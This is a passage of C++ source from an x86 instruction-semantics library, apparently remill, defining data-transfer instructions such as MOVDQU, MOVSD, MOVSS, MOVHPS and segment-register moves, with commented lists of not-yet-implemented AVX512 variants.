//4997 VMOVUPD VMOVUPD_XMMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
//4998 VMOVUPD VMOVUPD_MEMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
//4999 VMOVUPD VMOVUPD_YMMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
//5000 VMOVUPD VMOVUPD_YMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
//5001 VMOVUPD VMOVUPD_YMMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
//5002 VMOVUPD VMOVUPD_MEMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
# endif // HAS_FEATURE_AVX512
#endif // HAS_FEATURE_AVX
DEF_ISEL(MOVNTDQ_MEMdq_XMMdq) = MOVDQx<MV128W, V128>;
DEF_ISEL(MOVNTDQA_XMMdq_MEMdq) = MOVDQx<V128W, MV128>;
DEF_ISEL(MOVDQU_XMMdq_MEMdq) = MOVDQx<V128W, MV128>;
DEF_ISEL(MOVDQU_XMMdq_XMMdq_0F6F) = MOVDQx<V128W, V128>;
DEF_ISEL(MOVDQU_MEMdq_XMMdq) = MOVDQx<MV128W, V128>;
DEF_ISEL(MOVDQU_XMMdq_XMMdq_0F7F) = MOVDQx<V128W, V128>;
#if HAS_FEATURE_AVX
DEF_ISEL(VMOVNTDQ_MEMdq_XMMdq) = MOVDQx<MV128W, V128>;
DEF_ISEL(VMOVNTDQ_MEMqq_YMMqq) = MOVDQx<MV256W, VV256>;
//5061 VMOVNTDQ VMOVNTDQ_MEMu32_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT
//5062 VMOVNTDQ VMOVNTDQ_MEMu32_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT
//5063 VMOVNTDQ VMOVNTDQ_MEMu32_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT
DEF_ISEL(VMOVNTDQA_XMMdq_MEMdq) = MOVDQx<VV128W, MV128>;
DEF_ISEL(VMOVNTDQA_YMMqq_MEMqq) = MOVDQx<VV256W, MV256>;
//4142 VMOVNTDQA VMOVNTDQA_ZMMu32_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT
//4143 VMOVNTDQA VMOVNTDQA_XMMu32_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT
//4144 VMOVNTDQA VMOVNTDQA_YMMu32_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT
DEF_ISEL(VMOVDQU_XMMdq_MEMdq) = MOVDQx<VV128W, MV128>;
DEF_ISEL(VMOVDQU_XMMdq_XMMdq_6F) = MOVDQx<VV128W, VV128>;
DEF_ISEL(VMOVDQU_MEMdq_XMMdq) = MOVDQx<MV128W, VV128>;
DEF_ISEL(VMOVDQU_XMMdq_XMMdq_7F) = MOVDQx<VV128W, VV128>;
DEF_ISEL(VMOVDQU_YMMqq_MEMqq) = MOVDQx<VV256W, MV256>;
DEF_ISEL(VMOVDQU_YMMqq_YMMqq_6F) = MOVDQx<VV256W, VV256>;
DEF_ISEL(VMOVDQU_MEMqq_YMMqq) = MOVDQx<MV256W, VV256>;
DEF_ISEL(VMOVDQU_YMMqq_YMMqq_7F) = MOVDQx<VV256W, VV256>;
#endif // HAS_FEATURE_AVX
DEF_ISEL(MOVDQA_MEMdq_XMMdq) = MOVDQx<MV128W, V128>;
DEF_ISEL(MOVDQA_XMMdq_XMMdq_0F7F) = MOVDQx<V128W, V128>;
DEF_ISEL(MOVDQA_XMMdq_MEMdq) = MOVDQx<V128W, MV128>;
DEF_ISEL(MOVDQA_XMMdq_XMMdq_0F6F) = MOVDQx<V128W, V128>;
#if HAS_FEATURE_AVX
DEF_ISEL(VMOVDQA_XMMdq_MEMdq) = MOVDQx<VV128W, MV128>;
DEF_ISEL(VMOVDQA_XMMdq_XMMdq_6F) = MOVDQx<VV128W, VV128>;
DEF_ISEL(VMOVDQA_MEMdq_XMMdq) = MOVDQx<MV128W, VV128>;
DEF_ISEL(VMOVDQA_XMMdq_XMMdq_7F) = MOVDQx<VV128W, VV128>;
DEF_ISEL(VMOVDQA_YMMqq_MEMqq) = MOVDQx<VV256W, MV256>;
DEF_ISEL(VMOVDQA_YMMqq_YMMqq_6F) = MOVDQx<VV256W, VV256>;
DEF_ISEL(VMOVDQA_MEMqq_YMMqq) = MOVDQx<MV256W, VV256>;
DEF_ISEL(VMOVDQA_YMMqq_YMMqq_7F) = MOVDQx<VV256W, VV256>;
#endif // HAS_FEATURE_AVX
DEF_ISEL(MOVLPS_MEMq_XMMps) = MOVLPS<MV64W, V128>;
DEF_ISEL(MOVLPS_XMMq_MEMq) = MOVLPS<V128W, MV64>;
IF_AVX(DEF_ISEL(VMOVLPS_MEMq_XMMq) = MOVLPS<MV64W, VV128>;)
IF_AVX(DEF_ISEL(VMOVLPS_XMMdq_XMMdq_MEMq) = VMOVLPS;)
DEF_ISEL(MOVHLPS_XMMq_XMMq) = MOVHLPS;
IF_AVX(DEF_ISEL(VMOVHLPS_XMMdq_XMMq_XMMq) = VMOVHLPS;)
IF_AVX(DEF_ISEL(VMOVHLPS_XMMdq_XMMdq_XMMdq) = VMOVHLPS;)
DEF_ISEL(MOVLHPS_XMMq_XMMq) = MOVLHPS;
IF_AVX(DEF_ISEL(VMOVLHPS_XMMdq_XMMq_XMMq) = VMOVLHPS;)
IF_AVX(DEF_ISEL(VMOVLHPS_XMMdq_XMMdq_XMMdq) = VMOVLHPS;)
#if HAS_FEATURE_AVX
# if HAS_FEATURE_AVX512
//4606 VMOVLPS DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_TUPLE2
//4607 VMOVLPS VMOVLPS_MEMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_TUPLE2
# endif // HAS_FEATURE_AVX512
#endif // HAS_FEATURE_AVX
DEF_ISEL(MOVLPD_XMMsd_MEMq) = MOVLPD<V128W, MV64>;
DEF_ISEL(MOVLPD_MEMq_XMMsd) = MOVLPD<MV64W, V128>;
IF_AVX(DEF_ISEL(VMOVLPD_MEMq_XMMq) = MOVLPD<MV64W, VV128>;)
IF_AVX(DEF_ISEL(VMOVLPD_XMMdq_XMMdq_MEMq) = VMOVLPD;)
#if HAS_FEATURE_AVX
# if HAS_FEATURE_AVX512
//4599 VMOVLPD VMOVLPD_XMMf64_XMMf64_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_SCALAR
//4600 VMOVLPD VMOVLPD_MEMf64_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_SCALAR
# endif // HAS_FEATURE_AVX512
#endif // HAS_FEATURE_AVX
namespace {
template <typename D, typename S>
DEF_SEM(MOVSD_MEM, D dst, S src) {
FWriteV64(dst, FExtractV64(FReadV64(src), 0));
return memory;
}
DEF_SEM(MOVSD, V128W dst, V128 src) {
FWriteV64(dst, FInsertV64(FReadV64(dst), 0, FExtractV64(FReadV64(src), 0)));
return memory;
}
#if HAS_FEATURE_AVX
// Basically the same as `VMOVLPD`.
DEF_SEM(VMOVSD, VV128W dst, V128 src1, V128 src2) {
FWriteV64(dst, FInsertV64(FReadV64(src2), 1, FExtractV64(FReadV64(src1), 1)));
return memory;
}
#endif // HAS_FEATURE_AVX
} // namespace
DEF_ISEL(MOVSD_XMM_XMMsd_XMMsd_0F10) = MOVSD;
DEF_ISEL(MOVSD_XMM_XMMdq_MEMsd) = MOVSD_MEM<V128W, MV64>;
DEF_ISEL(MOVSD_XMM_MEMsd_XMMsd) = MOVSD_MEM<MV64W, V128>;
DEF_ISEL(MOVSD_XMM_XMMsd_XMMsd_0F11) = MOVSD;
#if HAS_FEATURE_AVX
DEF_ISEL(VMOVSD_XMMdq_MEMq) = MOVSD_MEM<VV128W, MV64>;
DEF_ISEL(VMOVSD_MEMq_XMMq) = MOVSD_MEM<MV64W, VV128>;
DEF_ISEL(VMOVSD_XMMdq_XMMdq_XMMq_10) = VMOVSD;
DEF_ISEL(VMOVSD_XMMdq_XMMdq_XMMq_11) = VMOVSD;
# if HAS_FEATURE_AVX512
//3632 VMOVSD VMOVSD_XMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: DISP8_SCALAR MASKOP_EVEX MEMORY_FAULT_SUPPRESSION SIMD_SCALAR
//3633 VMOVSD VMOVSD_MEMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: DISP8_SCALAR MASKOP_EVEX MEMORY_FAULT_SUPPRESSION SIMD_SCALAR
//3634 VMOVSD VMOVSD_XMMf64_MASKmskw_XMMf64_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: MASKOP_EVEX SIMD_SCALAR
//3635 VMOVSD VMOVSD_XMMf64_MASKmskw_XMMf64_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: MASKOP_EVEX SIMD_SCALAR
# endif // HAS_FEATURE_AVX512
#endif // HAS_FEATURE_AVX
DEF_ISEL(MOVNTSD_MEMq_XMMq) = MOVSD_MEM<MV64W, V128>;
namespace {
template <typename D, typename S>
DEF_SEM(MOVSS_MEM, D dst, S src) {
FWriteV32(dst, FExtractV32(FReadV32(src), 0));
return memory;
}
DEF_SEM(MOVSS, V128W dst, V128 src) {
FWriteV32(dst, FInsertV32(FReadV32(dst), 0, FExtractV32(FReadV32(src), 0)));
return memory;
}
#if HAS_FEATURE_AVX
DEF_SEM(VMOVSS, VV128W dst, V128 src1, V128 src2) {
FWriteV32(dst, FInsertV32(FReadV32(src1), 0, FExtractV32(FReadV32(src2), 0)));
return memory;
}
#endif // HAS_FEATURE_AVX
} // namespace
DEF_ISEL(MOVSS_XMMdq_MEMss) = MOVSS_MEM<V128W, MV32>;
DEF_ISEL(MOVSS_MEMss_XMMss) = MOVSS_MEM<MV32W, V128>;
DEF_ISEL(MOVSS_XMMss_XMMss_0F10) = MOVSS;
DEF_ISEL(MOVSS_XMMss_XMMss_0F11) = MOVSS;
#if HAS_FEATURE_AVX
DEF_ISEL(VMOVSS_XMMdq_MEMd) = MOVSS_MEM<VV128W, MV32>;
DEF_ISEL(VMOVSS_MEMd_XMMd) = MOVSS_MEM<MV32W, V128>;
DEF_ISEL(VMOVSS_XMMdq_XMMdq_XMMd_10) = VMOVSS;
DEF_ISEL(VMOVSS_XMMdq_XMMdq_XMMd_11) = VMOVSS;
# if HAS_FEATURE_AVX512
//3650 VMOVSS VMOVSS_XMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: DISP8_SCALAR MASKOP_EVEX MEMORY_FAULT_SUPPRESSION SIMD_SCALAR
//3651 VMOVSS VMOVSS_MEMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: DISP8_SCALAR MASKOP_EVEX MEMORY_FAULT_SUPPRESSION SIMD_SCALAR
//3652 VMOVSS VMOVSS_XMMf32_MASKmskw_XMMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: MASKOP_EVEX SIMD_SCALAR
//3653 VMOVSS VMOVSS_XMMf32_MASKmskw_XMMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: MASKOP_EVEX SIMD_SCALAR
# endif // HAS_FEATURE_AVX512
#endif // HAS_FEATURE_AVX
DEF_ISEL(MOVNTSS_MEMd_XMMd) = MOVSS_MEM<MV32W, V128>;
namespace {
DEF_SEM(MOVHPD, V128W dst, MV64 src) {
FWriteV64(dst, FInsertV64(FReadV64(dst), 1, FExtractV64(FReadV64(src), 0)));
return memory;
}
DEF_SEM(MOVHPD_STORE, MV64W dst, V128 src) {
FWriteV64(dst, FExtractV64(FReadV64(src), 1));
return memory;
}
#if HAS_FEATURE_AVX
DEF_SEM(VMOVHPD, VV256W dst, V128 src1, MV64 src2) {
FWriteV64(dst, FInsertV64(FReadV64(src1), 1, FExtractV64(FReadV64(src2), 0)));
return memory;
}
#endif // HAS_FEATURE_AVX
} // namespace
DEF_ISEL(MOVHPD_XMMsd_MEMq) = MOVHPD;
DEF_ISEL(MOVHPD_MEMq_XMMsd) = MOVHPD_STORE;
IF_AVX(DEF_ISEL(VMOVHPD_XMMdq_XMMq_MEMq) = VMOVHPD;)
IF_AVX(DEF_ISEL(VMOVHPD_MEMq_XMMdq) = MOVHPD_STORE;)
//5181 VMOVHPD VMOVHPD_XMMf64_XMMf64_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_SCALAR
//5182 VMOVHPD VMOVHPD_MEMf64_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_SCALAR
namespace {
DEF_SEM(MOVHPS, V128W dst, MV64 src) {
auto dst_vec = FReadV32(dst);
auto src_vec = FReadV32(src);
auto low_entry = FExtractV32(src_vec, 0);
auto high_entry = FExtractV32(src_vec, 1);
FWriteV32(dst, FInsertV32(FInsertV32(dst_vec, 2, low_entry), 3, high_entry));
return memory;
}
DEF_SEM(MOVHPS_STORE, MV64W dst, V128 src) {
auto dst_vec = FClearV32(FReadV32(dst));
auto src_vec = FReadV32(src);
auto low_entry = FExtractV32(src_vec, 2);
auto high_entry = FExtractV32(src_vec, 3);
FWriteV32(dst, FInsertV32(FInsertV32(dst_vec, 0, low_entry), 1, high_entry));
return memory;
}
#if HAS_FEATURE_AVX
DEF_SEM(VMOVHPS, VV256W dst, V128 src1, MV64 src2) {
auto dst_vec = FReadV32(src1);
auto src_vec = FReadV32(src2);
auto low_entry = FExtractV32(src_vec, 0);
auto high_entry = FExtractV32(src_vec, 1);
FWriteV32(dst, FInsertV32(FInsertV32(dst_vec, 2, low_entry), 3, high_entry));
return memory;
}
#endif // HAS_FEATURE_AVX
} // namespace
DEF_ISEL(MOVHPS_XMMq_MEMq) = MOVHPS;
DEF_ISEL(MOVHPS_MEMq_XMMps) = MOVHPS_STORE;
IF_AVX(DEF_ISEL(VMOVHPS_XMMdq_XMMq_MEMq) = VMOVHPS;)
IF_AVX(DEF_ISEL(VMOVHPS_MEMq_XMMdq) = MOVHPS_STORE;)
//5197 VMOVHPS VMOVHPS_XMMf32_XMMf32_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_TUPLE2
//5198 VMOVHPS VMOVHPS_MEMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_TUPLE2
namespace {
template <typename T>
DEF_SEM(MOV_ES, R16W dst, T src) {
Write(dst, Read(src));
return __remill_sync_hyper_call(state, memory,
SyncHyperCall::kX86SetSegmentES);
}
template <typename T>
DEF_SEM(MOV_SS, R16W dst, T src) {
Write(dst, Read(src));
return __remill_sync_hyper_call(state, memory,
SyncHyperCall::kX86SetSegmentSS);
}
template <typename T>
DEF_SEM(MOV_DS, R16W dst, T src) {
Write(dst, Read(src));
return __remill_sync_hyper_call(state, memory,
SyncHyperCall::kX86SetSegmentDS);
}
template <typename T>
DEF_SEM(MOV_FS, R16W dst, T src) {
Write(dst, Read(src));
return __remill_sync_hyper_call(state, memory,
SyncHyperCall::kX86SetSegmentFS);
}
template <typename T>
DEF_SEM(MOV_GS, R16W dst, T src) {
Write(dst, Read(src));
return __remill_sync_hyper_call(state, memory,
SyncHyperCall::kX86SetSegmentGS);
}
} // namespace
DEF_ISEL(MOV_MEMw_SEG) = MOV<M16W, R16>;
DEF_ISEL(MOV_GPRv_SEG_16) = MOV<R16W, R16>;
DEF_ISEL(MOV_GPRv_SEG_32) = MOV<R32W, R16>;
IF_64BIT(DEF_ISEL(MOV_GPRv_SEG_64) = MOV<R64W, R16>;)
DEF_ISEL(MOV_SEG_MEMw_ES) = MOV_ES<M16>;
DEF_ISEL(MOV_SEG_MEMw_SS) = MOV_SS<M16>;
DEF_ISEL(MOV_SEG_MEMw_DS) = MOV_DS<M16>;
DEF_ISEL(MOV_SEG_MEMw_FS) = MOV_FS<M16>;
DEF_ISEL(MOV_SEG_MEMw_GS) = MOV_GS<M16>;
DEF_ISEL(MOV_SEG_GPR16_ES) = MOV_ES<R16>;
DEF_ISEL(MOV_SEG_GPR16_SS) = MOV_SS<R16>;
DEF_ISEL(MOV_SEG_GPR16_DS) = MOV_DS<R16>;
DEF_ISEL(MOV_SEG_GPR16_FS) = MOV_FS<R16>;
DEF_ISEL(MOV_SEG_GPR16_GS) = MOV_GS<R16>;
/*
25 MOV_DR MOV_DR_DR_GPR32 DATAXFER BASE I86 ATTRIBUTES: NOTSX RING0
26 MOV_DR MOV_DR_DR_GPR64 DATAXFER BASE I86 ATTRIBUTES: NOTSX RING0
27 MOV_DR MOV_DR_GPR32_DR DATAXFER BASE I86 ATTRIBUTES: RING0
28 MOV_DR MOV_DR_GPR64_DR DATAXFER BASE I86 ATTRIBUTES: RING0
1312 MASKMOVDQU MASKMOVDQU_XMMdq_XMMdq DATAXFER SSE2 SSE2 ATTRIBUTES: FIXED_BASE0 MASKOP NOTSX
545 MOVMSKPS MOVMSKPS_GPR32_XMMps DATAXFER SSE SSE ATTRIBUTES:
585 MOVSHDUP MOVSHDUP_XMMps_MEMps DATAXFER SSE3 SSE3 ATTRIBUTES: REQUIRES_ALIGNMENT
586 MOVSHDUP MOVSHDUP_XMMps_XMMps DATAXFER SSE3 SSE3 ATTRIBUTES: REQUIRES_ALIGNMENT
647 MOVLHPS MOVLHPS_XMMq_XMMq DATAXFER SSE SSE ATTRIBUTES:
648 MOVQ2DQ MOVQ2DQ_XMMdq_MMXq DATAXFER SSE2 SSE2 ATTRIBUTES: MMX_EXCEPT NOTSX
689 MOV_CR MOV_CR_CR_GPR32 DATAXFER BASE I86 ATTRIBUTES: NOTSX RING0
690 MOV_CR MOV_CR_CR_GPR64 DATAXFER BASE I86 ATTRIBUTES: NOTSX RING0
691 MOV_CR MOV_CR_GPR32_CR DATAXFER BASE I86 ATTRIBUTES: RING0
692 MOV_CR MOV_CR_GPR64_CR DATAXFER BASE I86 ATTRIBUTES: RING0
957 MOVSLDUP MOVSLDUP_XMMps_MEMps DATAXFER SSE3 SSE3 ATTRIBUTES: REQUIRES_ALIGNMENT
958 MOVSLDUP MOVSLDUP_XMMps_XMMps DATAXFER SSE3 SSE3 ATTRIBUTES: REQUIRES_ALIGNMENT
1071 MOVBE MOVBE_GPRv_MEMv DATAXFER MOVBE MOVBE ATTRIBUTES: SCALABLE
1072 MOVBE MOVBE_MEMv_GPRv DATAXFER MOVBE MOVBE ATTRIBUTES: SCALABLE
1484 MOVDQ2Q MOVDQ2Q_MMXq_XMMq DATAXFER SSE2 SSE2 ATTRIBUTES: MMX_EXCEPT NOTSX
1495 MOVMSKPD MOVMSKPD_GPR32_XMMpd DATAXFER SSE2 SSE2 ATTRIBUTES:
1829 MASKMOVQ MASKMOVQ_MMXq_MMXq DATAXFER MMX PENTIUMMMX ATTRIBUTES: FIXED_BASE0 MASKOP NOTSX
1839 MOVHLPS MOVHLPS_XMMq_XMMq DATAXFER SSE SSE ATTRIBUTES:
1880 MOVDDUP MOVDDUP_XMMdq_MEMq DATAXFER SSE3 SSE3 ATTRIBUTES: UNALIGNED
1881 MOVDDUP MOVDDUP_XMMdq_XMMq DATAXFER SSE3 SSE3 ATTRIBUTES: UNALIGNED
1882 BSWAP BSWAP_GPRv DATAXFER BASE I486REAL ATTRIBUTES: SCALABLE
2101 VMOVMSKPD VMOVMSKPD_GPR32d_XMMdq DATAXFER AVX AVX ATTRIBUTES:
2102 VMOVMSKPD VMOVMSKPD_GPR32d_YMMqq DATAXFER AVX AVX ATTRIBUTES:
2107 VMOVMSKPS VMOVMSKPS_GPR32d_XMMdq DATAXFER AVX AVX ATTRIBUTES:
2108 VMOVMSKPS VMOVMSKPS_GPR32d_YMMqq DATAXFER AVX AVX ATTRIBUTES:
2202 VMOVSHDUP VMOVSHDUP_XMMdq_MEMdq DATAXFER AVX AVX ATTRIBUTES:
2203 VMOVSHDUP VMOVSHDUP_XMMdq_XMMdq DATAXFER AVX AVX ATTRIBUTES:
2204 VMOVSHDUP VMOVSHDUP_YMMqq_MEMqq DATAXFER AVX AVX ATTRIBUTES:
2205 VMOVSHDUP VMOVSHDUP_YMMqq_YMMqq DATAXFER AVX AVX ATTRIBUTES:
2281 VMOVDDUP VMOVDDUP_XMMdq_MEMq DATAXFER AVX AVX ATTRIBUTES:
2282 VMOVDDUP VMOVDDUP_XMMdq_XMMdq DATAXFER AVX AVX ATTRIBUTES:
2283 VMOVDDUP VMOVDDUP_YMMqq_MEMqq DATAXFER AVX AVX ATTRIBUTES:
2284 VMOVDDUP VMOVDDUP_YMMqq_YMMqq DATAXFER AVX AVX ATTRIBUTES:
2464 VMOVSLDUP VMOVSLDUP_XMMdq_MEMdq DATAXFER AVX AVX ATTRIBUTES:
2465 VMOVSLDUP VMOVSLDUP_XMMdq_XMMdq DATAXFER AVX AVX ATTRIBUTES:
2466 VMOVSLDUP VMOVSLDUP_YMMqq_MEMqq DATAXFER AVX AVX ATTRIBUTES:
2467 VMOVSLDUP VMOVSLDUP_YMMqq_YMMqq DATAXFER AVX AVX ATTRIBUTES:
2619 VMOVLHPS VMOVLHPS_XMMdq_XMMq_XMMq DATAXFER AVX AVX ATTRIBUTES:
3395 VMOVHLPS VMOVHLPS_XMMdq_XMMdq_XMMdq DATAXFER AVX AVX ATTRIBUTES:
3804 VPMOVDB VPMOVDB_XMMu8_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
3805 VPMOVDB VPMOVDB_MEMu8_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3806 VPMOVDB VPMOVDB_XMMu8_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
3807 VPMOVDB VPMOVDB_MEMu8_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3808 VPMOVDB VPMOVDB_XMMu8_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
3809 VPMOVDB VPMOVDB_MEMu8_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3814 VPMOVSDB VPMOVSDB_XMMi8_MASKmskw_ZMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
3815 VPMOVSDB VPMOVSDB_MEMi8_MASKmskw_ZMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3816 VPMOVSDB VPMOVSDB_XMMi8_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
3817 VPMOVSDB VPMOVSDB_MEMi8_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3818 VPMOVSDB VPMOVSDB_XMMi8_MASKmskw_YMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
3819 VPMOVSDB VPMOVSDB_MEMi8_MASKmskw_YMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3826 VPMOVDW VPMOVDW_YMMu16_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
3827 VPMOVDW VPMOVDW_MEMu16_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3828 VPMOVDW VPMOVDW_XMMu16_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
3829 VPMOVDW VPMOVDW_MEMu16_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3830 VPMOVDW VPMOVDW_XMMu16_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
3831 VPMOVDW VPMOVDW_MEMu16_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3853 VMOVSHDUP VMOVSHDUP_ZMMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
3854 VMOVSHDUP VMOVSHDUP_ZMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX
3855 VMOVSHDUP VMOVSHDUP_XMMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
3856 VMOVSHDUP VMOVSHDUP_XMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX
3857 VMOVSHDUP VMOVSHDUP_YMMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
3858 VMOVSHDUP VMOVSHDUP_YMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX
3861 VPMOVSDW VPMOVSDW_YMMi16_MASKmskw_ZMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
3862 VPMOVSDW VPMOVSDW_MEMi16_MASKmskw_ZMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3863 VPMOVSDW VPMOVSDW_XMMi16_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
3864 VPMOVSDW VPMOVSDW_MEMi16_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3865 VPMOVSDW VPMOVSDW_XMMi16_MASKmskw_YMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
3866 VPMOVSDW VPMOVSDW_MEMi16_MASKmskw_YMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3897 VPMOVZXWQ VPMOVZXWQ_ZMMi64_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
3898 VPMOVZXWQ VPMOVZXWQ_ZMMi64_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3899 VPMOVZXWQ VPMOVZXWQ_XMMi64_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
3900 VPMOVZXWQ VPMOVZXWQ_XMMi64_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
3901 VPMOVZXWQ VPMOVZXWQ_YMMi64_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
